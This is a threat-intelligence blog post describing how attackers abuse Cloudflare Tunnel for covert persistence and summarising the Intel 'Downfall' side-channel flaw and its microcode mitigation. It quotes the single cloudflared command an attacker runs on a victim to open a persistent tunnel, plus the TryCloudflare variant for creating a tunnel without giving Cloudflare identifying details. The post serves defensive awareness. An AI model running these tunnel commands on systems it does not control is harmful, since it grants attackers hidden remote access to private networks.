Welcome back to another week of Cyber Threat Intelligence (CTI). This week's report highlights how threat actors are abusing the legitimate Cloudflare service ‘Cloudflare Tunnel’ to establish persistence and obfuscate activity and a new side-channel attack ‘Downfall’ disclosed for Intel processors.
Per Cloudflare's documentation, it provides a secure way to connect resources to Cloudflare without a publicly routable IP address. It does not send traffic to an external IP, instead, the 'cloudflared' daemon creates outbound-only connections to the Cloudflare global network. The Tunnel supports connections to HTTP servers, SSH servers, remote desktops, and other protocols.
Threat actor configures the Tunnel environment on their Cloudflare account.
Threat actor gains access to the victim's machine via traditional methods (i.e. phishing, social engineering, remote exploit)
Threat actor issues just a single command on the victim machine, establishing a persistent tunnel back to the attacker-controlled Cloudflare environment.
The only parameter that needs to be passed at the command line is the associated token with the tunnel the threat actor created.
cloudflared tunnel run --token <token from Cloudflare>
This 'private network' configuration is not updated in the configuration output on the command line, effectively hiding the configuration from defenders.
This allows the threat actor to interact with any device on the 'private network'.
Cloudflare Tunnels also allows for entire CIDR ranges to have access to the tunnel.
It should also be noted that Cloudflare has a TryCloudflare feature, which allows for users to create a single-use cloudflared tunnel. This setup process would allow a threat actor to create a tunnel without providing identifying information to Cloudflare for attribution.
cloudflared tunnel --url http://localhost:<port>
While the tunnel itself provides a great layer of obfuscation for the threat actor, several indicators can be monitored for this type of activity:
This vulnerability affects Intel Server CPUs, from the 6th (Skylake) generation to 11th (Tiger Lake) generation processors. A full list of vulnerable CPU models can be found on Intel's site here.
For this vulnerability to be successfully exploited, the threat actor needs to be sharing the same physical processor core. This scenario is most common in cloud computing. The threat actor would need to download a malicious payload and execute the payload on the same physical processor as the victim. Given the specific conditions that need to be met to carry out the attack, the overall risk is considered to be low. However, proof-of-concept code has been published to Github, as well as detailed research and documentation of the vulnerability, making potential public exploitation a possibility.
Intel has a microcode update that can mitigate the vulnerability, which can be found here. Additional information from Intel regarding the vulnerability can be found here.
It should be noted that applying this update can result in up to 50% performance degradation. Organizations must decide if negating the risk of exploitation is worth the performance penalty of the CPU.
PacketWatch publishes this report and other cybersecurity threat intel to the security community for free via our blog. If you are interested in personalized threat intel, contact us today to learn about our enterprise threat intelligence services.
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.